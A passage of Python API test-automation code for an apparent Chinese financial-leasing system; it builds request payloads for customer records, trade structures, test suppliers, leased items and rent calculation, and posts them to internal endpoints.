\"name\": jsonpath.jsonpath(res_query,'$..legalRepresentative.name')[0],\n \"idCardType\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardTypeName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_query,'$..legalRepresentative.idCardNo')[0],\n \"mobile\": jsonpath.jsonpath(res_query,'$..legalRepresentative.mobile')[0],\n \"shareholdingRatio\": None,\n \"renterRelationship\": None,\n \"residenceAddress\": None,\n \"creditReportTime\": None,\n \"authId\": jsonpath.jsonpath(res_query,'$..legalRepresentative.authId')[0],\n \"idProvince\": \"110000\",\n \"idProvinceName\": \"北京市\",\n \"idCity\": \"110100\",\n \"idCityName\": \"市辖区\",\n \"idLocation\": \"110101\",\n \"idLocationName\": \"东城区\",\n \"idAddress\": \"上海\",\n \"idArray\": [\"110000\", \"110100\", \"110101\"]\n },\n \"beneficiary\": {\n \"authId\": jsonpath.jsonpath(res_credit,'$..id')[0],\n \"name\": jsonpath.jsonpath(res_credit,'$..creditCustomerName')[0],\n \"idCardNo\": jsonpath.jsonpath(res_credit,'$..creditCustomerNo')[0],\n \"idCardType\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdType')[0],\n \"idCardTypeName\": jsonpath.jsonpath(res_credit,'$..creditCustomerIdTypeName')[0],\n \"residenceAddress\": jsonpath.jsonpath(res_credit,'$..creditCustomerAddress')[0],\n \"idArray\": [\"110000\", \"110100\", \"110101\"],\n \"idProvince\": \"110000\",\n \"idCity\": \"110100\",\n \"idLocation\": \"110101\"\n },\n \"personalIds\": [],\n \"custEnterpriseIds\": [],\n \"personalInfoModels\":[\n {\n \"id\":res_query[\"data\"][\"personalInfoModels\"][0][\"id\"],\n \"projectNo\": projectNo,\n \"projectCustomerInfoId\": res_query[\"data\"][\"personalInfoModels\"][0][\"projectCustomerInfoId\"],\n \"sourceId\":res_query[\"data\"][\"personalInfoModels\"][0][\"sourceId\"],\n \"roleType\":res_query[\"data\"][\"personalInfoModels\"][0][\"roleType\"],\n \"name\":res_query[\"data\"][\"personalInfoModels\"][0][\"name\"],\n \"idCardType\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardType\"],\n \"idCardTypeName\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardTypeName\"],\n \"idCardNo\":res_query[\"data\"][\"personalInfoModels\"][0][\"idCardNo\"],\n 
\"mobile\":res_query[\"data\"][\"personalInfoModels\"][0][\"mobile\"],\n \"country\":\"156\",\n \"countryName\":None,\n \"actualControllerRelationship\":\"director\",\n \"actualControllerRelationshipName\":None,\n \"maritalStatus\":\"MARRIED\",\n \"maritalStatusName\":None,\n \"gender\":\"1\",\n \"genderName\":None,\n \"birthDate\":\"1980-07-28\",\n \"nation\":\"22\",\n \"nationName\":None,\n \"education\":\"1010\",\n \"educationName\":None,\n \"annualIncome\":\"1000.00\",\n \"idProvince\":\"110000\",\n \"idProvinceName\":None,\n \"idCity\":\"110100\",\n \"idCityName\":None,\n \"idLocation\":\"110101\",\n \"idLocationName\":None,\n \"idAddress\":res_query[\"data\"][\"personalInfoModels\"][0][\"idAddress\"],\n \"creditReportTime\":None,\n \"email\":\"666@163.com\",\n \"authId\":res_query[\"data\"][\"personalInfoModels\"][0][\"authId\"],\n \"idArray\":[\n \"110000\",\n \"110100\",\n \"110101\"\n ]\n }\n ],\n \"projCustEnterpriseVMList\":[\n {\n \"id\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"id\"],\n \"projectNo\": projectNo,\n \"sourceId\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"sourceId\"],\n \"projectCustomerInfoId\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectCustomerInfoId\"],\n \"roleType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"roleType\"],\n \"name\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"name\"],\n \"idCardType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardType\"],\n \"idCardTypeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardTypeName\"],\n \"idCardNo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardNo\"],\n \"mobile\":None,\n \"country\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"country\"],\n \"countryName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"countryName\"],\n \"interIndustryClassifyOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyOneName\"],\n \"interIndustryClassifyOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyOne\"],\n \"interIndustryClassifyTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyTwoName\"],\n \"interIndustryClassifyTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyTwo\"],\n \"interIndustryClassifyThreeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyThreeName\"],\n \"interIndustryClassifyThree\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyThree\"],\n \"interIndustryClassifyFourName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyFourName\"],\n \"interIndustryClassifyFour\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyFour\"],\n \"industryClassifyOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyOneName\"],\n \"industryClassifyOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyOne\"],\n \"industryClassifyTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyTwoName\"],\n \"industryClassifyTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyTwo\"],\n \"registrationProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationProvinceName\"],\n \"registrationProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationProvince\"],\n 
\"registrationCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationCityName\"],\n \"registrationCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationCity\"],\n \"registrationRegionName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationRegionName\"],\n \"registrationRegion\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationRegion\"],\n \"registrationAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationAddress\"],\n \"officeProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeProvinceName\"],\n \"officeProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeProvince\"],\n \"officeCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeCityName\"],\n \"officeCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeCity\"],\n \"officeLocationName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeLocationName\"],\n \"officeLocation\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeLocation\"],\n \"officeAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeAddress\"],\n \"actualBusinessProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessProvinceName\"],\n \"actualBusinessProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessProvince\"],\n \"actualBusinessCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessCityName\"],\n \"actualBusinessCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessCity\"],\n \"actualBusinessLocationName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessLocationName\"],\n \"actualBusinessLocation\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessLocation\"],\n \"actualBusinessAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessAddress\"],\n \"rentStockholderRelated\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"rentStockholderRelated\"],\n \"rentRelated\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"rentRelated\"],\n \"ruralUrbanSignageName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"ruralUrbanSignageName\"],\n \"ruralUrbanSignage\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"ruralUrbanSignage\"],\n \"projectSourceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectSourceName\"],\n \"projectSource\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectSource\"],\n \"licProjectInvestmentOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentOneName\"],\n \"licProjectInvestmentOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentOne\"],\n \"licProjectInvestmentTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentTwoName\"],\n \"licProjectInvestmentTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentTwo\"],\n \"licProjectInvestmentThreeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentThreeName\"],\n \"licProjectInvestmentThree\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentThree\"],\n \"licProjectInvestmentFourName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentFourName\"],\n \"licProjectInvestmentFour\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentFour\"],\n 
\"businessScope\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessScope\"],\n \"mainBusinessProducts\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"mainBusinessProducts\"],\n \"enterpriseSizeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseSizeName\"],\n \"enterpriseSize\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseSize\"],\n \"enterpriseType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseType\"],\n \"enterpriseTypeName\":None,\n \"institutionRegistCertNumber\":None,\n \"financialInstitutionCode\":None,\n \"holdingType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"holdingType\"],\n \"holdingTypeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"holdingTypeName\"],\n \"zhongzhengCode\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"zhongzhengCode\"],\n \"currencyName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"currencyName\"],\n \"currency\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"currency\"],\n \"registeredCapital\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registeredCapital\"],\n \"paidinCapital\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"paidinCapital\"],\n \"capitalization\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"capitalization\"],\n \"revenue\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"revenue\"],\n \"establishmentTime\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"establishmentTime\"],\n \"businessLicenseExpirationDate\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessLicenseExpirationDate\"],\n \"businessStatus\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessStatus\"],\n \"businessStatusName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessStatusName\"],\n \"employeeNumber\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"employeeNumber\"],\n \"legalRepresentative\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalRepresentative\"],\n \"legalRepresentativeMobile\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalRepresentativeMobile\"],\n \"idProvince\": \"120000\",\n \"idProvinceName\": None,\n \"idCity\": \"120100\",\n \"idCityName\": None,\n \"idLocation\": \"120101\",\n \"idLocationName\": None,\n \"idAddress\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idAddress\"],\n \"legalPersonPhone\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalPersonPhone\"],\n \"actualController\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualController\"],\n \"nationalEconomy\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"nationalEconomy\"],\n \"nationalEconomyName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"nationalEconomyName\"],\n \"listedCompanyLogoName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"listedCompanyLogoName\"],\n \"listedCompanyLogo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"listedCompanyLogo\"],\n \"resolutionType\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"resolutionType\"],\n \"resolutionTypeName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"resolutionTypeName\"],\n \"email\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"email\"],\n \"authId\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"authId\"],\n \"shareholdingStructureList\": [],\n \"idArray\": [\"120000\", \"120100\", \"120101\"],\n \"internationalIndustryType\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n 
\"registration\": [\"110000\", \"110100\", \"110101\"]\n }]\n }\n res = self.api(method = 'POST', url =url,json = data)\n\n '''交易结构-增加'''\n def projTradeAdd(self,projectNo):\n trade = []\n url = 'ifc/api/credit-apply/trades/addProjTrades'\n data = {\n \"projectNo\": projectNo\n }\n for i in range(9):\n res = self.api(method='POST', url=url, json=data)\n trade.append(res)\n return trade\n\n\n '''供应商保存'''\n def supplierSave(self, projectNo, custName, id_1, id_2, id_3, id_4, id_5, id_6, id_7, id_8, id_9):\n url = 'ifc/api/credit-apply/trades/saveSupplier'\n data = {\"xzw\": {\"supplierId\":\"9820\",\n \"supplierName\":\"测试Z500供应商合同公司1\",\n \"certId\":\"91350102315514081E\",\n \"artificialPerson\":\"夏紫文\",\n \"registerFullAddress\":\"110000|110100|110111;北京市|市辖区|房山区|123123\",\n \"businessAddress\":\"110000|110100|110111;北京市|市辖区|房山区|123123\"},\n \"jxw\": {\"supplierId\": \"9836\",\n \"supplierName\": \"测试Z500供应商合同公司J1\",\n \"certId\": \"91110000FB0RBU0R7P\",\n \"artificialPerson\": \"季晓伟\",\n \"registerFullAddress\": \"110000|110100|110101;北京市|市辖区|东城区\",\n \"businessAddress\": \"110000|110100|110101;北京市|市辖区|东城区\"},\n \"fht\": {\"supplierId\": \"9847\",\n \"supplierName\": \"测试供应商F1\",\n \"certId\": \"91410100732484450T\",\n \"artificialPerson\": \"范怀通\",\n \"registerFullAddress\": \"410000|410100|410102;河南省|郑州市|中原区|宇工路88号\",\n \"businessAddress\": \"410000|410100|410102;河南省|郑州市|中原区|宇工路88号\"},\n \"zll\": {\"supplierId\": \"9841\",\n \"supplierName\": \"测试Z500供应商合同公司J2\",\n \"certId\": \"91120000WH9CX8CE5N\",\n \"artificialPerson\": \"季晓伟\",\n \"registerFullAddress\": \"120000|120100|120101;天津市|市辖区|和平区\",\n \"businessAddress\": \"120000|120100|120101;天津市|市辖区|和平区\"},\n \"cm\": {\"supplierId\": \"9852\",\n \"supplierName\": \"测试Z500特斯拉\",\n \"certId\": \"91310115MA1H9YGWXX\",\n \"artificialPerson\": \"陈鸣\",\n \"registerFullAddress\": \"110000|110100|110105;北京市|市辖区|朝阳区|注册详细地址\",\n \"businessAddress\": \"110000|110100|110105;北京市|市辖区|朝阳区|注册详细地址\"}\n }\n list = []\n data_1 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_1,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_2 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_2,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": 
data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_3 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_3,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n\n\n data_4 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_4,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"信用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_5 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_5,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n 
\"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"��用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_6 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_6,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"信用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n\n\n\n data_7 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_7,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n data_8 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_8,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n 
\"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n data_9 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_9,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n\n list.append(data_1)\n list.append(data_2)\n list.append(data_3)\n list.append(data_4)\n list.append(data_5)\n list.append(data_6)\n list.append(data_7)\n list.append(data_8)\n list.append(data_9)\n for i in list:\n res = self.api(method='POST', url=url, json=i)\n\n '''查询品牌'''\n def pageSerach(self):\n url = 'ifc/api/proj/pageSearchBrands'\n data = {\n \"searchParam\": \"\",\n \"current\": 1,\n \"size\": 50\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''添加租赁物'''\n def leaseSave(self,projectNo,id):\n res = self.pageSerach()\n url = 'ifc/api/credit-apply/trades/saveLeasehold'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": id,\n \"tradesLeaseholdList\": [{\n \"showMore\": True,\n \"projectNo\": \"\",\n \"projTradesId\": None,\n \"leaseholdName\": \"第一个租赁物\",\n \"brandId\": jsonpath.jsonpath(res,\"$..idArtlBrand\")[49],\n \"brandFullName\": jsonpath.jsonpath(res,\"$..brandFullName\")[49],\n \"spec\": \"123\",\n \"leaseholdType\": \"625304010101\",\n \"industryClassify\": [\"A\", \"A01\", \"A011\"],\n \"industryClassifyName\": \"\",\n \"industryClassifyOne\": \"A\",\n \"industryClassifyOneName\": \"\",\n \"industryClassifyTwo\": \"A01\",\n \"industryClassifyTwoName\": \"\",\n \"price\": \"10000.00\",\n \"amount\": \"1\",\n \"financeAmt\": 1000,\n \"financeScale\": \"10.00\",\n \"bookAmt\": \"10000.00\",\n \"isInstallBracelet\": 1,\n \"isLesseeRegisterAddress\": 1,\n \"isLesseeTheOwner\": 0,\n \"ownerType\": \"\",\n \"ownerName\": \"\",\n \"place\": [],\n \"placeProvince\": \"\",\n \"placeProvinceName\": \"\",\n \"placeCity\": \"\",\n \"placeCityName\": \"\",\n \"placeDistrict\": \"\",\n \"placeDistrictName\": \"\",\n \"placeDetailAddress\": \"\",\n \"directReversalUniqueIdentifier\": \"\",\n \"leaseholdTypeList\": [\"625001000000\", \"625101010000\", \"625201010100\", \"625304010101\"],\n \"leaseholdTypeOne\": \"625001000000\",\n 
\"leaseholdTypeTwo\": \"625101010000\",\n \"leaseholdTypeThree\": \"625201010100\",\n \"industryClassifyThree\": \"A011\",\n \"brandLevel\": jsonpath.jsonpath(res,\"$..brandLevel\")[49],\n \"facilityName\": jsonpath.jsonpath(res,\"$..facilityName\")[49]\n }]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''查询融资信息'''\n def financeQuery(self,projectNo,projTradesId):\n url = 'ifc/api/credit-apply/trades/queryFinanceInfo'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId\n }\n res = self.api(method='POST', url=url, json=data)\n\n return res\n\n '''租金测算'''\n def rentCalc(self,projectNo,projTradesId,id):\n url = 'ifc/api/credit-apply/trades/rentCalc'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId,\n \"id\": id,\n \"rateAppearMode\": \"Implication\",\n \"rateAppearModeName\": \"隐含利率\",\n \"lprBaseRate\": None,\n 